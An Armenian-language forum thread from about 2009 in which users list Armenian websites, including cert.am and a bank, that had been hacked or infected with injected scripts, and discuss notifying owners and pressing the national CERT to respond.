Էսօր day.az-ն էր մի լավ ցանկ հրապարակել, բայց ինչքան հասկացա, ոչ բոլորն են ճիշտ: Քանի որ սայթ կար, որի դոմենի ժամկետը անցել էր, ու դժվար թե էդ վիճակում քանդվեր :) ...
day.az/news/hitech/140310.html
Էսօր day.az-ն էր մի լավ ցանկ հրապարակել, բայց ինչքան հասկացա, ոչ բոլորն են ճիշտ: Քանի որ սայթ կար, որի դոմենի ժամկետը անցել էր, ու դժվար թե էդ վիճակում քանդվեր :) ...
day.az/news/hitech/140310.html
դուրսա գալիս ես ադրբեջանցիք ինձնից շատ հայկական սայտեր գիտեն, կյանքիս մեջ եսքան հայկական սայթ չէի տեսել:)
դուրսա գալիս ես ադրբեջանցիք ինձնից շատ հայկական սայտեր գիտեն, կյանքիս մեջ եսքան հայկական սայթ չէի տեսել:)
Ստեղ հազարից ավել հայատառ, հայալեզու, հայկական սայտ կա։ http://www.dmoz.org/World/Armenian/
Իսկ նստացնելը լավ ասեցիր՝ Ադրբեջանը մի շարք փաստաթխթեր է ստորագրել ՏՏ անվտանգության ապահովության մասին, մեր կողմը լավ կաներ ամեն մի ջարդված կայք միջազգային մակարդակի վրա Ադրբեջանի քթից բերեր, պահանջեր քրեկան ապատասխանատվության կանչել ազերական հաքերներին, բերեր դա որպես ադրբեջանակնա հասարակության թշնամանքի և պետական հակահայկական պրոպագանդայի ապացույցներ և այլն։
Բայց դե դա երազանքներ են.. մեր կառույցները շատ ավելի լուրջ հարցերում ոչ մի բան չեն ձեռնարկում…
«Միջազգային մակարդակի վրա» պահանջելը անիմաստա։ Օրինակ Եվրոպայում ու Ռուսաստանում լիքը հաքերներ կան հայտնի, որոնք մի շարք կարևոր սայտեր էն ջարդել ԱՄՆ-ում, և միլլիոնավոր դոլլարների վնաս բերել, բայց ԱՄՆ-ն չի կարող այդ մարդկանց ձեռբակալել քանի որ յուրիսդիկցիա չունի ԱՄՆ-ից դուրս։ 2001 թվականին ՖԲԻ-ը ստեղծեծ կեղծ ընկերություն «Ինվիտա» անունով, և այդ ընկերության կողմից աշխատանքի հրավիրեց երկու շատ հայտնի ռուս հաքերների։ Հենց իրանք ոտը դրեցին ԱՄՆ-ի տարածքի վրա, միանգամից ձերբակալվեցին։ Նույն բանը փորձեցին անել հայտնի Գերմանական հաքերի հետ, բայց չստացվեց։ Ավելի մանրամասն դրա մասին կարող ես կարդալ այստեղ՝ http://blog.wired.com/27bstroke6/2008/11/valve-tricked-h.html
«Միջազգային մակարդակի վրա» պահանջելը անիմաստա։ Օրինակ Եվրոպայում ու Ռուսաստանում լիքը հաքերներ կան հայտնի, որոնք մի շարք կարևոր սայտեր էն ջարդել ԱՄՆ-ում, և միլլիոնավոր դոլլարների վնաս բերել, բայց ԱՄՆ-ն չի կարող այդ մարդկանց ձեռբակալել քանի որ յուրիսդիկցիա չունի ԱՄՆ-ից դուրս։ 2001 թվականին ՖԲԻ-ը ստեղծեծ կեղծ ընկերություն «Ինվիտա» անունով, և այդ ընկերության կողմից աշխատանքի հրավիրեց երկու շատ հայտնի ռուս հաքերների։ Հենց իրանք ոտը դրեցին ԱՄՆ-ի տարածքի վրա, միանգամից ձերբակալվեցին։ Նույն բանը փորձեցին անել հայտնի Գերմանական հաքերի հետ, բայց չստացվեց։ Ավելի մանրամասն դրա մասին կարող ես կարդալ այստեղ՝ http://blog.wired.com/27bstroke6/2008/11/valve-tricked-h.html
Կոնկրետ այս դպեքի մասին չէի կարդացել, բայց էլի նման դեպքեր կային, ինչքան հիշում եմ։
Չե բնականաբար ազերի հաքերը, հայկական բանտում դա ոչ գիտական ֆատնաստիկայի ոլորտից է։ Հարցը հենց Ադրբեջանին հանել/մեղադրել ՏՏ հանցագործերի բունի մեջ, ինչպես դա անում են Ռուսաստանի, Չինաստանի, ժամանակին արևելյան եվրուպայի (այնտեղ հիմնակնաւոմ piracy էր) հետ։ + իմ ասած ագրեսիվ թշնամանքի օրինակ։
Զուտ քաղաքական լծակ։
ուղարկեցի այդ բոլոր կայքերը cert.am -ին սակայն ոչ մի պատասխան չստացա։ Չեմ էլ իմանում թե պետք է ստանայի թե ոչ։ Եթե cert-ը իրոք չի աշխատում ապա ինչ որ մի բան իմ կարծիքով պետք է անել։ Կարելի է Xelgen-ի խորհրդով ստեղծել մի ուրիշ cert-ի նման կայք, որտեղ կհավաքվի բոլոր ջարդված կայքերի ցուցակը, և այդ կայքերի տերերը դրա մասին կտեղեկացվեն։ Համաձայն եմ Չուկի հետ, որ ուղղակի կայքերի ցուցակը այստեղ գրելը շատ մեծ օգուտ չի բերում, բայց մինչև նորմալ լուծում գտնելը տեղադրեմ ներկա պահին իմ իմացած ջարդված հայկական կայքերը՝
_http://www.armeniantextile.com/
_http://www.organic.am/
_http://www.elcompany.net/
_http://www.javakhk.am/
_http://www.technopolis.am/
ներկա պահին իմ իմացած ջարդված հայկական կայքերը՝
_http://www.armeniantextile.com/
_http://www.organic.am/
_http://www.elcompany.net/
_http://www.javakhk.am/
_http://www.technopolis.am/
.am-ով գրանցված կայքերը բացեցի ԱՄՆԻՔ-ի կայքում և որոշեցի նշված հեռախոսի համարներով զանգել, տեղեկացնել տեխ. պատասխանատուներին՝
martik.am - որը կիսատ են բուժել, հեռախոսը չի պատասխանում, առաջին անգամ չէ, որ զագնում եմ, և աշխատանքային և ոչ աշխատանքային ժամերին
organic.am - համարը չի պատասխանում
javakhk.am - կիսատ բջջային համար է, տան համարը «ժամանակաորապես չի կարող կանչվել»
technopolis.am - «բաժանարդը միացված չէ կայանին»
Այսպիսի ուրախ բաներ :), մնում է մեյլերին գրել, բայց ինչ-որ բան ինձ հուշում է, որ մոյլերը նմնանատիպ, լքված վիճակում են լինելու։
.am-ով գրանցված կայքերը բացեցի ԱՄՆԻՔ-ի կայքում և որոշեցի նշված հեռախոսի համարներով զանգել, տեղեկացնել տեխ. պատասխանատուներին՝
martik.am - որը կիսատ են բուժել, հեռախոսը չի պատասխանում, առաջին անգամ չէ, որ զագնում եմ, և աշխատանքային և ոչ աշխատանքային ժամերին
organic.am - համարը չի պատասխանում
javakhk.am - կիսատ բջջային համար է, տան համարը «ժամանակաորապես չի կարող կանչվել»
technopolis.am - «բաժանարդը միացված չէ կայանին»
Այսպիսի ուրախ բաներ :), մնում է մեյլերին գրել, բայց ինչ-որ բան ինձ հուշում է, որ մոյլերը նմնանատիպ, լքված վիճակում են լինելու։
երևի սայտերին էլ չէին հետևում որ ջարդեցին
Էլ ավելի «ուրախ» բան ասե՞մ։
Ինքը cert.am-ն էլ վարաքված…
Ու աչքիս երկու անգամ է վարաքվել, վերջինը ամենաուշը հոկեմբերին։ Բախտը էդքանով է բերել որ կոդը տեղադրել են </html>-ից հետո, ու ինքը բրաուզերիների մեծ մասi կողմից անտեսվում է։
Կփորձեմ CERT'ի հետ կապված հարցը համապատասխան պատասխանատու օղակներում բարձրացնել
Էլ ավելի «ուրախ» բան ասե՞մ։
Ինքը cert.am-ն էլ վարաքված…
Ու աչքիս երկու անգամ է վարաքվել, վերջինը ամենաուշը հոկեմբերին։ Բախտը էդքանով է բերել որ կոդը տեղադրել են </html>-ից հետո, ու ինքը բրաուզերիների մեծ մասi կողմից անտեսվում է։
UPD: Սխալվեցի, ներկա պահին «մեյլվերը» մի հատ է, և ջավա-սքրիփտը տեղափոխում է իր գեներացված <iframe>-ը, <html>-ի տարածք։ Դրանից ավել խորանալու ժամանակ/հավես չկա ներկա պահին…
Ներսես_AM
05.01.2009, 18:56
Հայբիզնես Բանկի առաջնային էջը կոտրված է: Այֆրեմ է մեջը մտցված, որ վերահասցեավորում է մի ինչոր ՊԴՖ ֆայլի վրա, որից համակարգիչը կախում է մինչև պրոցեսսը քիլլ չարվի:
_http://www.armbusinessbank.am/
Մեկը ես, որպես վեբմաստեր, իմ վրա զգացել եմ էտ ազերների "արշավները" այ ստեղ մտեք, http://www.day.az/print/news/hitech/140310.html հիմնականում իմ սայթերն են որ հարձակման են ենթարկվել, էն էլ էտ սայթերի հոսթինգ-պրովայդերի թերությունների պատճառով…
Կփորձեմ CERT'ի հետ կապված հարցը համապատասխան պատասխանատու օղակներում բարձրացնել
Ինչպես և խոստացել էի CERT'ի հետ կապված հարցը քննարկվել է համապատասխան պատասխանատու օղակում, առաջարկվել են կոնկրետ քայլեր և առաջարկություններ, գալիք շաբաթվա ընթացքում պարզ կդառնա հետագա ճակատագիրը :)
Ներսես_AM
11.01.2009, 12:06
Հայբիզնեսբանկը աշխատում է: Զանգեցի ասեցի, ուղղեցին:
_http://www.armpress.com/ -նել ջարդեցին։ CERT-ից ինչ որ նորություններ կա՞ն։
_http://www.armpress.com/ -նել ջարդեցին։ CERT-ից ինչ որ նորություններ կա՞ն։
2 օր առաջ եմ զրուցել, դեռ ժողովը չի կայացել :(
բայց վաղը անկախ դրանից այդ հարցով միհատել եմ ուզում այցելել իրենց
gyumricity.am-ն է վարաքված։
Ինչքան հասկացա cert.am-ը չի գործում։
Իսկ վարակված կայքերը շատանում են։
Ներկա պահին ինձ հայտնի վարակված կայքերի ցուցակը բերում եմ այստեղ։ Դրանցից մեկը Էկոնոմիկայի Նախարարության պաշտոնական կայքն է։
1. http://www.javakhk.am/
2. http://gyumricity.am/
3. http://old.e-courses.am/
4. http://www.iravunk.com/arm/
5. http://www.autoworld.am/
6. http://www.shirakc.org/
7. http://college.mskh.am/forfun/
8. http://www.ypc.am/eng/html/dv.htm
9. http://www.inecotrade.am/ineco/
10. http://mineconomy.am/webmail/bin/culture/
11. http://www.aniv.am/
12. http://www.amnewsservice.org/
13. http://www.aryarestaurant.am/
Phantom Lord
17.06.2009, 23:47
Մի անգամ rocker.am-ն էին hack արել:
Դեվելոպերները ինչան ուժ ունեն գցում են հոսթինգի վրա և հակառակը: Երեկ ARMINCo-ի հոսթինգն են ջարդել ըստ երևույթի(իհարկե իրենք "պրիզնատ" չեն գալիս), բայց դե մեկը բերանից թռցրեց, որ root-ի փասերին են ձեռք գցել: Արդյունքւմ մի 2-3 օր firefox-ը գուգլի շնորհիվ warning-ներ կբերի տեղադրված կայքերը բացելիս, չնայած վիրուսները արդեն վերացրել են:
Հայկական կայքերի անվտանգության հետ կապված խնդիրների մեջ հետաքրքրվողները պետք է միանան Ֆեյսբուքի այս փակ խմբին՝ http://www.facebook.com/group.php?gid=138421917931
Իսկ այս թեման համարում եմ որ պետք է փակել և ջնջել։
ես սայթից ովա տեղյակ , ու ոնց կարաք բնորոշեք ես երևույթը՞՞՞
http://s61.radikal.ru/i174/0911/05/cc094e6e5750.gif
ես սայթից ովա տեղյակ
Սա առաջին օրը չի որ սենցա, նույնել adult ///am-ն ա տենց
պետքա հարցնել տիրոջից tx /// am-ից, չնայած իմ կարծիքով սև PR ա անում, ՝ որովհետև ինչքանով ես եմ նկատել զբաղված ա դոմեյնների վերավաճառմամաբ անբովանդակ սայթերի բացելով ու մեջը գովազդներ դնելով ու սենց...
ետ tx.am ը ինչոր լեգալ կազմակերպությունա,՞
մեկել ետ նկարի իմաստը չեմ ջոգում. ՞
յանիմ ինչ,
ետ tx.am ը ինչոր լեգալ կազմակերպությունա,՞
մեկել ետ նկարի իմաստը չեմ ջոգում. ՞
յանիմ ինչ,
չգիտեմ լեգալ ա թե ինչա, բայց մնացած յանիմ ինչերը ինձ թվում իրանցից լավ ոչ ոք չի իմանա:)